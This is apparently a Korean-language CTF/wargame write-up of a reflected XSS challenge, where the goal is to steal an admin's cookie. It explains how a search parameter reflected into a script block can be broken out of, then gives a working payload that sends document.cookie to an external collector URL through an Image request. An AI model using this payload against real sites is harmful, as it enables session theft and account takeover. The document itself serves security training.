<Segfault> 워게임 문제풀이 [XSS 2]

목표: 관리자의 쿠키를 탈취하라!

---

 

 

우선 글쓰기 게시판 입니다.

글을 쓰기전 일단 입력이 되는 부분을 체크하고 가겠습니다.

Search 창에 "Fubao" 라고 적어준뒤 알림창이 뜨는 양상을 보겠습니다.

---

 

저희가 적어준 값이 페이지에 표시되는것을 볼수 있습니다.

그러면 저희는 이렇게 생각해 볼수 있겠죠.

1. "이 부분을 Refelcted XSS 공격에 사용할 수 있을까?"

2. "그러면 우선 Get 방식으로 파라미터가 전달되는지 확인해봐야겠다"

 

그리하여 Burp suite 로 방금보낸 요청을 살펴보도록 하죠.

 

---

요청

 

보시면 Fubao 라는 값을 POST 방식으로 보내주고 , 그 값이 응답에 alert 를 사용해서 띄워지고 있습니다.

여기서 제가 확인하고 싶은것은

 

'변수들을 GET 방식으로 바꿔 보내도 같은 응답이 오느냐.' 입니다.

만약 가능하다면 입력값에 ') alert(1); // 을 삽입하여 POC 코드를 실행해볼수 있겠죠.

그리고 된다면 이는 Reflected XSS 로 이어질수 있습니다.

 

---

GET 방식으로 바꿔서 보낸 후 응답

 

GET 방식으로 변수값을 보내도 동일한 응답을 받는것을 확인하였습니다.

이제 POC 코드를 체크해보겠습니다.

Board_Search 입력값 : ') alert(1); //

 

스크립트 코드 안에서 POC 코드인 alert(1); 이 유효하게 동작하는것을 확인하였습니다.

이제 alert(1) 대신 cookie 탈취 코드를 입력해주겠습니다.

 

---

입력값 >> ');var%20data=document.cookie;var%20i=new%20Image();i.src='https://encxlimxsq6z.x.pipedream.net?cookie='%2Bdata;

쿠키 탈취 악성스크립트 작성

쿠키 탈취 성공

 

 

제가 설정해둔 사이트로 Image 파일 요청을 보내면서 동시에 쿠키값을 전달하는것을 확인하실수 있습니다.

이제 이 GET 방식의 링크를 관리자의 컴퓨터로 접속하게 해보도록 하겠습니다. 

---

어드민이 성공적으로 공격자 서버의 방문

결과

 

무사히 플래그 값을 얻을수 있었다.

 

---

 

긴 글 읽어주셔서 감사합니다!